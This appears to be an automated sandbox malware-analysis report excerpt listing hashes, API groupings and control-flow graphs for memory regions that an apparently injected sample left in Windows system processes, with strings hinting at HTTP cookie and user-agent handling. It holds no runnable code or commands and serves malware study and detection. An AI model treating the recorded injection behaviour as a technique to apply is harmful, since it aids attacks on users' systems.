                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_20_2_1c0000_bin.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: HandleLibraryLoadModule
                                                                                                                                                                • String ID: j
                                                                                                                                                                • API String ID: 4133054770-2747090070
                                                                                                                                                                • Opcode ID: 99f70bd6b06b53a7fd6d28a083be50230d299d6762310f15b5c168a6665c2821
                                                                                                                                                                • Instruction ID: c4430a2c0c24a2b0bdc06aa21888522cca28319f24652424d60ea3f5ea681fdb
                                                                                                                                                                • Opcode Fuzzy Hash: 99f70bd6b06b53a7fd6d28a083be50230d299d6762310f15b5c168a6665c2821
                                                                                                                                                                • Instruction Fuzzy Hash: BEF0C871948250AEEB127A708855FAE32BCAF70701F00C45DBA95DA041DF30C740DAB7
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                APIs
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.2886605765.00000000003D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 003D0000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_3d0000_RuntimeBroker.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ExitSleepThreadUser
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3375650085-0
                                                                                                                                                                • Opcode ID: 992149f37510bf435a63d6c026afa7e5196d855f937f02806c44f21d9357a639
                                                                                                                                                                • Instruction ID: 37606bd29bffd8747609349bc4e3a59d52761269dbb140b3fc6ccf4b2a91a728
                                                                                                                                                                • Opcode Fuzzy Hash: 992149f37510bf435a63d6c026afa7e5196d855f937f02806c44f21d9357a639
                                                                                                                                                                • Instruction Fuzzy Hash: DF31D4734102047FEB077B70AD46BBA3BACEF11700F000167BD95DE2A6EA7449649AB5
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                APIs
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000017.00000002.2818202841.0000000000900000.00000040.00000001.00020000.00000000.sdmp, Offset: 00900000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_23_2_900000_RuntimeBroker.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ExitSleepThreadUser
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3375650085-0
                                                                                                                                                                • Opcode ID: 992149f37510bf435a63d6c026afa7e5196d855f937f02806c44f21d9357a639
                                                                                                                                                                • Instruction ID: 807355393fe14c1897a20badd90106663a8bf34a3f2784256eb9570d4bf43842
                                                                                                                                                                • Opcode Fuzzy Hash: 992149f37510bf435a63d6c026afa7e5196d855f937f02806c44f21d9357a639
                                                                                                                                                                • Instruction Fuzzy Hash: 9A31E472000204AFEB017B709D86BBA3BACFF91300F444166FD85DA0E2EA7549A48AB5
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                APIs
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000018.00000002.2883062494.0000000000180000.00000040.00000001.00020000.00000000.sdmp, Offset: 00180000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_24_2_180000_ApplicationFrameHost.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Virtual$Protect$Alloc
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2541858876-0
                                                                                                                                                                • Opcode ID: d4c8ab3f009f1a42ba1f4b1f1ca1d2215188908ad26b68096351dda695124fe0
                                                                                                                                                                • Instruction ID: f7edfa1d29ee3a2f15c71f23f1afa3dacc25a52c64f2328ccefa2793ada852ba
                                                                                                                                                                • Opcode Fuzzy Hash: d4c8ab3f009f1a42ba1f4b1f1ca1d2215188908ad26b68096351dda695124fe0
                                                                                                                                                                • Instruction Fuzzy Hash: 1121E531A34C1D0BEB58B27C9859764F6D6E79C320F980295E90DD36E4ED58CC8287C6
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                APIs
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000018.00000002.2883062494.0000000000180000.00000040.00000001.00020000.00000000.sdmp, Offset: 00180000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_24_2_180000_ApplicationFrameHost.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ExitSleepThreadUser
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3375650085-0
                                                                                                                                                                • Opcode ID: 992149f37510bf435a63d6c026afa7e5196d855f937f02806c44f21d9357a639
                                                                                                                                                                • Instruction ID: 5f0a2bf08c062a83ee58e576ca9a39c726153a08bf7c3d9358f7d983c0235e19
                                                                                                                                                                • Opcode Fuzzy Hash: 992149f37510bf435a63d6c026afa7e5196d855f937f02806c44f21d9357a639
                                                                                                                                                                • Instruction Fuzzy Hash: 7331B6724102087FEB427F709D46ABA376CEF26310F440165BD85DA0A6EB744BA9CFB5
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                APIs
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000001A.00000002.2878821569.0000000000190000.00000040.00000001.00020000.00000000.sdmp, Offset: 00190000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_26_2_190000_RuntimeBroker.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ExitSleepThreadUser
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3375650085-0
                                                                                                                                                                • Opcode ID: 992149f37510bf435a63d6c026afa7e5196d855f937f02806c44f21d9357a639
                                                                                                                                                                • Instruction ID: 623531ca5508d48381e8169b3b0e04df07f96b68e4b13c9decdab74f5fa118bc
                                                                                                                                                                • Opcode Fuzzy Hash: 992149f37510bf435a63d6c026afa7e5196d855f937f02806c44f21d9357a639
                                                                                                                                                                • Instruction Fuzzy Hash: F131F772510205BFEF027F709D46ABA3BACEF25300F400565BD85DA0A2EB744DA4CBB5
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                APIs
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000001C.00000002.2884175132.0000000000010000.00000040.00000001.00020000.00000000.sdmp, Offset: 00010000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_28_2_10000_UserOOBEBroker.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Virtual$Protect$Alloc
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2541858876-0
                                                                                                                                                                • Opcode ID: d4c8ab3f009f1a42ba1f4b1f1ca1d2215188908ad26b68096351dda695124fe0
                                                                                                                                                                • Instruction ID: 9f39b5367da6598aeeb1998e776373a994835cae58933e0181d4283a84448e61
                                                                                                                                                                • Opcode Fuzzy Hash: d4c8ab3f009f1a42ba1f4b1f1ca1d2215188908ad26b68096351dda695124fe0
                                                                                                                                                                • Instruction Fuzzy Hash: 6021F930B34C1D0BEB5CA27C98597A4F6E2E79C320F940295EA0DD36D4ED58CC8183C6
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Control-flow Graph

APIs
Memory Dump Source
• Source File: 0000001C.00000002.2884175132.0000000000010000.00000040.00000001.00020000.00000000.sdmp, Offset: 00010000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_28_2_10000_UserOOBEBroker.jbxd
Similarity
• API ID: ExitSleepThreadUser
• String ID:
• API String ID: 3375650085-0
• Opcode ID: 992149f37510bf435a63d6c026afa7e5196d855f937f02806c44f21d9357a639
• Instruction ID: 6daea8f8473804d12748bca0b7204fc4a623126665c209879b0ad2024dc0075f
• Opcode Fuzzy Hash: 992149f37510bf435a63d6c026afa7e5196d855f937f02806c44f21d9357a639
• Instruction Fuzzy Hash: 8231B6724142046FEB017BB09D4AAFA7BACEF11310F044165BDC5DA0A7DEB449D5CBB5
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

APIs
Memory Dump Source
• Source File: 0000001D.00000002.2885240702.00000000000D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000D0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_29_2_d0000_svchost.jbxd
Similarity
• API ID: ExitSleepThreadUser
• String ID:
• API String ID: 3375650085-0
• Opcode ID: 992149f37510bf435a63d6c026afa7e5196d855f937f02806c44f21d9357a639
• Instruction ID: e07ed74e5cc9ac58003678b7d18a2ed3e8e34b21eca328e534d94c088b93a5ac
• Opcode Fuzzy Hash: 992149f37510bf435a63d6c026afa7e5196d855f937f02806c44f21d9357a639
• Instruction Fuzzy Hash: 3431D2724103047FEB017B709D8ABFA7BACEF11300F000167BD89DA2A3EE7449649AB5
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

APIs
Memory Dump Source
• Source File: 0000001E.00000002.2878758310.0000000000260000.00000040.00000001.00020000.00000000.sdmp, Offset: 00260000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_30_2_260000_dllhost.jbxd
Similarity
• API ID: ExitSleepThreadUser
• String ID:
• API String ID: 3375650085-0
• Opcode ID: 992149f37510bf435a63d6c026afa7e5196d855f937f02806c44f21d9357a639
• Instruction ID: 9ec0f4c8c139119009ddabdc2b4aa269233a87e76af611ef1baa78d60f79bf3b
• Opcode Fuzzy Hash: 992149f37510bf435a63d6c026afa7e5196d855f937f02806c44f21d9357a639
• Instruction Fuzzy Hash: 1731E8724202056FEB01BF709D86ABB776CEF11300F040165BD85DA0A6EA744DF4DBB5
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

Memory Dump Source
• Source File: 0000001F.00000002.2960232156.0000000004D80000.00000040.00000001.00020000.00000000.sdmp, Offset: 04D80000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_31_2_4d80000_cscript.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 0e1f2a4e7413688aa54805ed2a14ac9b83cd4127bce701e40c3c8803db53eeff
• Instruction ID: bd152e34d45244b5b0de908b3409e54b62d17a94b8f1b9f181fbd7a7c39f8d8c
• Opcode Fuzzy Hash: 0e1f2a4e7413688aa54805ed2a14ac9b83cd4127bce701e40c3c8803db53eeff
• Instruction Fuzzy Hash: 70519131644254AFEB13AF20CC85BAA77FCEF04B44F050199AB49FE0D6DAB0A594CA65
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

Memory Dump Source
• Source File: 0000001F.00000002.2960232156.0000000004D80000.00000040.00000001.00020000.00000000.sdmp, Offset: 04D80000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_31_2_4d80000_cscript.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: f5727545300d1671addd51e91b40c8cbd905ff098a5558d7618b97e1a8f51269
• Instruction ID: 240a908095b31d48dabf343665f2126191557b9bfc172afeab7e0d25957057ac
• Opcode Fuzzy Hash: f5727545300d1671addd51e91b40c8cbd905ff098a5558d7618b97e1a8f51269
• Instruction Fuzzy Hash: 9521FF724046249EEF03BF60C9C8CAA73ECEF40608F45056A99C5EF049FA70A159CAF6
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

Memory Dump Source
• Source File: 0000001F.00000002.2960232156.0000000004D80000.00000040.00000001.00020000.00000000.sdmp, Offset: 04D80000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_31_2_4d80000_cscript.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: e6710b313372bdb89baaa3f3abf609e97fcf4defd94341f28ea73213f73bc76a
• Instruction ID: afde93bafbda14b7bf7125b07b2fa8006c521ac69a90eb641091875bf5b51a57
• Opcode Fuzzy Hash: e6710b313372bdb89baaa3f3abf609e97fcf4defd94341f28ea73213f73bc76a
• Instruction Fuzzy Hash: 0B218E31A04216AFDF12AE78C844B6DBBB5BF04700F054229F955BB594D770A815CB94
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

Memory Dump Source
• Source File: 0000001F.00000002.2960232156.0000000004D80000.00000040.00000001.00020000.00000000.sdmp, Offset: 04D80000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_31_2_4d80000_cscript.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 6d5916cffd13119fdbd97c2973cedf6b12916aa16a29f0e56b04471841f1574a
• Instruction ID: a52074f1b3dbf11521ca03e5d76b893b1dcf0efebbea6fb33ed7553931c56f0f
• Opcode Fuzzy Hash: 6d5916cffd13119fdbd97c2973cedf6b12916aa16a29f0e56b04471841f1574a
• Instruction Fuzzy Hash: 501149725046249EEF03BF60C5C8CBA73ECEE50608B45096A9DC6EE449FE70A159CAF5
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

Memory Dump Source
• Source File: 0000001F.00000002.2960232156.0000000004D80000.00000040.00000001.00020000.00000000.sdmp, Offset: 04D80000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_31_2_4d80000_cscript.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 550d547703b1faf33bdbb28134adf901e3b34dfa1c128e3e0b52710aeb13400a
• Instruction ID: 9756340ad906f119ebdef4e94682a1741d49f2d090b9b202d17a7e762fd154c8
• Opcode Fuzzy Hash: 550d547703b1faf33bdbb28134adf901e3b34dfa1c128e3e0b52710aeb13400a
• Instruction Fuzzy Hash: A9F012B0788280A6FF403B70CC4967D36B8EF50B09F04059AAD8DAD0D6DE75E550DEB5
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

Strings
Memory Dump Source
• Source File: 0000001F.00000002.2960232156.0000000004D80000.00000040.00000001.00020000.00000000.sdmp, Offset: 04D80000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_31_2_4d80000_cscript.jbxd
Similarity
• API ID:
• String ID: -Age$Cook$User$ie: $nt:
• API String ID: 0-2052191038
• Opcode ID: 2b93bd9568e5da8988b8e1df8da560840dd12be90571bd433eb3dce17dfd8eb8
• Instruction ID: dfcd06c3ad851cb1e0bd18f450b5ddc6074d6a96eed789f2027d34425a491574
• Opcode Fuzzy Hash: 2b93bd9568e5da8988b8e1df8da560840dd12be90571bd433eb3dce17dfd8eb8
• Instruction Fuzzy Hash: D24174B6600209BFEF129F65CC44BEEBFB9FF80704F154059EA44AA254D730E640CB94
Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

Control-flow Graph (legend: Executed / Not Executed; basic blocks and edges as extracted from the graph image)
control_flow_graph 134 4d84675-4d84680 135 4d8468b-4d8468d 134->135 136 4d84686 call 4d83a1c 134->136 137 4d8469d-4d846cd 135->137 138 4d8468f-4d84698 call 4d83a6e 135->138 136->135 141 4d846d3-4d846f5 137->141 142 4d847e7-4d847ec 137->142 138->137 141->142 144 4d846fb-4d84720 141->144 146 4d84738-4d8475a 144->146 147 4d84722-4d84737 144->147 149 4d8475c-4d8477e 146->149 150 4d847bf-4d847c9 146->150 147->146 149->150 156 4d84780-4d847a2 149->156 151 4d847cb-4d847dd call 4d83673 150->151 152 4d847e0-4d847e5 150->152 151->152 152->142 156->150 158 4d847a4-4d847bc 156->158 158->150
Strings
Memory Dump Source
• Source File: 0000001F.00000002.2960232156.0000000004D80000.00000040.00000001.00020000.00000000.sdmp, Offset: 04D80000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_31_2_4d80000_cscript.jbxd
Similarity
• API ID:
• String ID: -Age$Cook$User$ie: $nt:
• API String ID: 0-2052191038
• Opcode ID: 21bbdfff56fab31c03729283b2ea7a1e7782b6cd8000812816065b0b8d19ca46
• Instruction ID: 3f9d9746d182d49cfa9ed767f343ebd2e20e28e0d4ad236aa8651c43168c0601
• Opcode Fuzzy Hash: 21bbdfff56fab31c03729283b2ea7a1e7782b6cd8000812816065b0b8d19ca46
• Instruction Fuzzy Hash: 184177B6600209BFEF125F65CC44BEEBFB9FF84704F154059EA44AA154D734E550CB94
Uniqueness
• Uniqueness Score: -1.00%

Control-flow Graph (graph image not recoverable from the extracted text)
APIs
Memory Dump Source
• Source File: 00000020.00000002.2879057988.0000000000880000.00000040.00000001.00020000.00000000.sdmp, Offset: 00880000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_32_2_880000_conhost.jbxd
Similarity
• API ID: ExitSleepThreadUser
• String ID:
• API String ID: 3375650085-0
• Opcode ID: 992149f37510bf435a63d6c026afa7e5196d855f937f02806c44f21d9357a639
• Instruction ID: 880e9aabe061995b8033cec9ddf34236fde6215fc8b9e8af3826ea7dc37c58af
• Opcode Fuzzy Hash: 992149f37510bf435a63d6c026afa7e5196d855f937f02806c44f21d9357a639
• Instruction Fuzzy Hash: A031D4724002086FEF417F749D4AABA3BACFF11300F000165FD85DA0A6EA7449A9CFB6
Uniqueness
• Uniqueness Score: -1.00%

Control-flow Graph (graph image not recoverable from the extracted text)
APIs
Memory Dump Source
• Source File: 00000021.00000002.2882880281.0000000000900000.00000040.00000001.00020000.00000000.sdmp, Offset: 00900000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_33_2_900000_conhost.jbxd
Similarity
• API ID: ExitSleepThreadUser
• String ID:
• API String ID: 3375650085-0
• Opcode ID: 992149f37510bf435a63d6c026afa7e5196d855f937f02806c44f21d9357a639
• Instruction ID: 807355393fe14c1897a20badd90106663a8bf34a3f2784256eb9570d4bf43842
• Opcode Fuzzy Hash: 992149f37510bf435a63d6c026afa7e5196d855f937f02806c44f21d9357a639
• Instruction Fuzzy Hash: 9A31E472000204AFEB017B709D86BBA3BACFF91300F444166FD85DA0E2EA7549A48AB5
Uniqueness
• Uniqueness Score: -1.00%

Control-flow Graph (graph image not recoverable from the extracted text)
APIs
Memory Dump Source
• Source File: 00000023.00000002.2416975568.0000000000890000.00000040.00000001.00020000.00000000.sdmp, Offset: 00890000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_35_2_890000_RuntimeBroker.jbxd
Similarity
• API ID: ExitSleepThreadUser
• String ID:
• API String ID: 3375650085-0
• Opcode ID: 992149f37510bf435a63d6c026afa7e5196d855f937f02806c44f21d9357a639
• Instruction ID: 07823f00acbba98c857846331e43a59f6ae1f0485edbcd5ffcc4fcbcede751e9
• Opcode Fuzzy Hash: 992149f37510bf435a63d6c026afa7e5196d855f937f02806c44f21d9357a639
• Instruction Fuzzy Hash: 1931E872514209BFEF017B749D4AABA3BACFF11300F480165BD85EA0A6DA744D54CEB6
Uniqueness
• Uniqueness Score: -1.00%

Control-flow Graph (graph image not recoverable from the extracted text)
APIs
Memory Dump Source
• Source File: 00000024.00000002.2879966123.0000000000030000.00000040.00000001.00020000.00000000.sdmp, Offset: 00030000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_36_2_30000_RuntimeBroker.jbxd
Similarity
• API ID: ExitSleepThreadUser
• String ID:
• API String ID: 3375650085-0
• Opcode ID: 992149f37510bf435a63d6c026afa7e5196d855f937f02806c44f21d9357a639
• Instruction ID: 399418c09c5b7e2c3d73a8b0021ab89984c00016f6ce4307ea0ddb10d8413dad
• Opcode Fuzzy Hash: 992149f37510bf435a63d6c026afa7e5196d855f937f02806c44f21d9357a639
• Instruction Fuzzy Hash: DB31E4720112046FEB037B709D9AAFA3BACEF11300F044166BD85DA0A7EE744965CAB5
Uniqueness
• Uniqueness Score: -1.00%

Control-flow Graph (legend: Executed / Not Executed; basic blocks and edges as extracted from the graph image)
control_flow_graph 0 153093e-153095f call 1530cc4 call 15314bc call 1533cc0 8 1530967-1530989 0->8 10 1530af1-1530af2 8->10 11 153098f-15309d2 call 15309d9 8->11 15 15309d4-15309d5 11->15 16 1530a3d-1530a80 11->16 17 15309d7-15309e8 call 1533653 15->17 18 1530a3c 15->18 22 1530a82-1530aae 16->22 23 1530aec call 1530af3 16->23 17->23 29 15309ee-1530a10 17->29 18->16 22->23 27 1530ab0-1530abc 22->27 23->10 31 1530ac1-1530ae5 27->31 29->23 33 1530a16-1530a3b 29->33 31->10 37 1530ae7-1530aea 31->37 33->18 33->23 37->23 37->31
Memory Dump Source
• Source File: 00000025.00000002.2920211818.0000000001530000.00000040.00000001.00020000.00000000.sdmp, Offset: 01530000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_37_2_1530000_BjCNEZCMnwLaEEzWr.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 0e1f2a4e7413688aa54805ed2a14ac9b83cd4127bce701e40c3c8803db53eeff
• Instruction ID: bfb71d6599cb9aa37b775a7998da41e31f27bb2c06e961b9814277841c08e0c5
• Opcode Fuzzy Hash: 0e1f2a4e7413688aa54805ed2a14ac9b83cd4127bce701e40c3c8803db53eeff
• Instruction Fuzzy Hash: 5F51A0316443559FEB239F24CC85B9A7BBCBF44740F0401D9BA49FF0D6DAB09690CA65
Uniqueness
• Uniqueness Score: -1.00%

Control-flow Graph (legend: Executed / Not Executed; basic blocks and edges as extracted from the graph image)
control_flow_graph 38 15314bc-1531590 call 15314de call 1530c9c call 1531345 * 6
Memory Dump Source
• Source File: 00000025.00000002.2920211818.0000000001530000.00000040.00000001.00020000.00000000.sdmp, Offset: 01530000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_37_2_1530000_BjCNEZCMnwLaEEzWr.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 4e691a712de486e4dfceb288b4c3d9d3fe3d652e5e2e3b2f50e0e601de67137e
• Instruction ID: bc842a58cbe7f3129858502c201789af0a962d056c29377c56ff0e5c7dacd0b7
• Opcode Fuzzy Hash: 4e691a712de486e4dfceb288b4c3d9d3fe3d652e5e2e3b2f50e0e601de67137e
• Instruction Fuzzy Hash: AB210C72404A159EDB03AF70C9C8CAA73ECFF80604F45096A9D89EF049FE709554CAE6
Uniqueness
• Uniqueness Score: -1.00%

Control-flow Graph (legend: Executed / Not Executed; basic blocks and edges as extracted from the graph image)
control_flow_graph 57 1531345-1531352 58 15313eb-15313ec 57->58 59 1531358-153135e 57->59 59->58 60 1531364-153137a 59->60 60->58 62 153137c-153138f 60->62 64 1531391-1531398 62->64 65 153139b-15313ab call 1530e7c 64->65 68 15313ad-15313e2 65->68 68->58
Memory Dump Source
• Source File: 00000025.00000002.2920211818.0000000001530000.00000040.00000001.00020000.00000000.sdmp, Offset: 01530000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_37_2_1530000_BjCNEZCMnwLaEEzWr.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: e6710b313372bdb89baaa3f3abf609e97fcf4defd94341f28ea73213f73bc76a
• Instruction ID: e3e00bfc64eeedb08cf9e19d048e16e8a9b44262a705f9935532f7c1e0a6df41
• Opcode Fuzzy Hash: e6710b313372bdb89baaa3f3abf609e97fcf4defd94341f28ea73213f73bc76a
• Instruction Fuzzy Hash: 42218E31A04216AFEB119E78C884B5DBFB5BF44700F054215FA55BF594D770E810CBA4
Uniqueness
• Uniqueness Score: -1.00%

Control-flow Graph (legend: Executed / Not Executed; basic blocks and edges as extracted from the graph image)
control_flow_graph 69 15314de-1531590 call 1533653 call 1530c9c call 1531345 * 6
Memory Dump Source
• Source File: 00000025.00000002.2920211818.0000000001530000.00000040.00000001.00020000.00000000.sdmp, Offset: 01530000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_37_2_1530000_BjCNEZCMnwLaEEzWr.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: d4917235bce67b0bd341cc4376806be672fb8739d92a651c71d1172738683fcb
                                                                                                                                                                • Instruction ID: 05c7f1cc36f858789376472e338b7915f94e5e79cdef9c1388d9f3152c6f32a9
                                                                                                                                                                • Opcode Fuzzy Hash: d4917235bce67b0bd341cc4376806be672fb8739d92a651c71d1172738683fcb
                                                                                                                                                                • Instruction Fuzzy Hash: 82115972404A159EEF03AF70C5C8CAA73ECFE90604B4509AA9D85EF449FE709564CAE5
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                control_flow_graph 87 1533f0d-1533f29 call 1533653 call 153379f 92 1533f3b-1533f66 call 1533f78 * 3 87->92 93 1533f2b-1533f39 call 153401b 87->93 106 1533f71 92->106 100 1533f76-1533f77 93->100 106->100 107 1533f71 call 1533f78 106->107 107->100
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000025.00000002.2920211818.0000000001530000.00000040.00000001.00020000.00000000.sdmp, Offset: 01530000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_37_2_1530000_BjCNEZCMnwLaEEzWr.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: 550d547703b1faf33bdbb28134adf901e3b34dfa1c128e3e0b52710aeb13400a
                                                                                                                                                                • Instruction ID: 8fe12d3cb3e441990bee6a0556aa354f8604d869ddfd465e044947236253c73c
                                                                                                                                                                • Opcode Fuzzy Hash: 550d547703b1faf33bdbb28134adf901e3b34dfa1c128e3e0b52710aeb13400a
                                                                                                                                                                • Instruction Fuzzy Hash: F2F01C70588243AAFF813BB08C4965D3BB8BFE0786F440591AAD9EF0D4DE7885509E75
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                control_flow_graph 133 1534675-153468d call 1533a1c 136 153468f-1534698 call 1533a6e 133->136 137 153469d-15346cd 133->137 136->137 140 15346d3-15346f5 137->140 141 15347e7-15347ec 137->141 140->141 143 15346fb-1534720 140->143 145 1534722-1534737 143->145 146 1534738-153475a 143->146 145->146 148 15347bf-15347c9 146->148 149 153475c-153477e 146->149 150 15347e0-15347e5 148->150 151 15347cb-15347dd call 1533673 148->151 149->148 155 1534780-15347a2 149->155 150->141 151->150 155->148 157 15347a4-15347bc 155->157 157->148
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000025.00000002.2920211818.0000000001530000.00000040.00000001.00020000.00000000.sdmp, Offset: 01530000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_37_2_1530000_BjCNEZCMnwLaEEzWr.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID: -Age$Cook$User$ie: $nt:
                                                                                                                                                                • API String ID: 0-2052191038
                                                                                                                                                                • Opcode ID: 21bbdfff56fab31c03729283b2ea7a1e7782b6cd8000812816065b0b8d19ca46
                                                                                                                                                                • Instruction ID: 843821476b653e7af06adfb0cb1c55024d2b10ba47123d3dd80fc51a7be7e39b
                                                                                                                                                                • Opcode Fuzzy Hash: 21bbdfff56fab31c03729283b2ea7a1e7782b6cd8000812816065b0b8d19ca46
                                                                                                                                                                • Instruction Fuzzy Hash: 88414DB6500208BFEF125FA9CC48B9EBFB9FFC0704F154069EA44AB254D7709641CB94
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                control_flow_graph 108 1534674-1534680 109 153468b-153468d 108->109 110 1534686 call 1533a1c 108->110 111 153468f-1534698 call 1533a6e 109->111 112 153469d-15346cd 109->112 110->109 111->112 115 15346d3-15346f5 112->115 116 15347e7-15347ec 112->116 115->116 118 15346fb-1534720 115->118 120 1534722-1534737 118->120 121 1534738-153475a 118->121 120->121 123 15347bf-15347c9 121->123 124 153475c-153477e 121->124 125 15347e0-15347e5 123->125 126 15347cb-15347dd call 1533673 123->126 124->123 130 1534780-15347a2 124->130 125->116 126->125 130->123 132 15347a4-15347bc 130->132 132->123
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000025.00000002.2920211818.0000000001530000.00000040.00000001.00020000.00000000.sdmp, Offset: 01530000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_37_2_1530000_BjCNEZCMnwLaEEzWr.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID: -Age$Cook$User$ie: $nt:
                                                                                                                                                                • API String ID: 0-2052191038
                                                                                                                                                                • Opcode ID: 2b93bd9568e5da8988b8e1df8da560840dd12be90571bd433eb3dce17dfd8eb8
                                                                                                                                                                • Instruction ID: 8ff097804311596a3df30e51f96364c48d0216ecfa56fdd983d7458a784f881c
                                                                                                                                                                • Opcode Fuzzy Hash: 2b93bd9568e5da8988b8e1df8da560840dd12be90571bd433eb3dce17dfd8eb8
                                                                                                                                                                • Instruction Fuzzy Hash: 24415EB6500209BFEF129FA5CC44BEEBFBAFF80704F154069EA44AB254D7709641CB94
                                                                                                                                                                Uniqueness

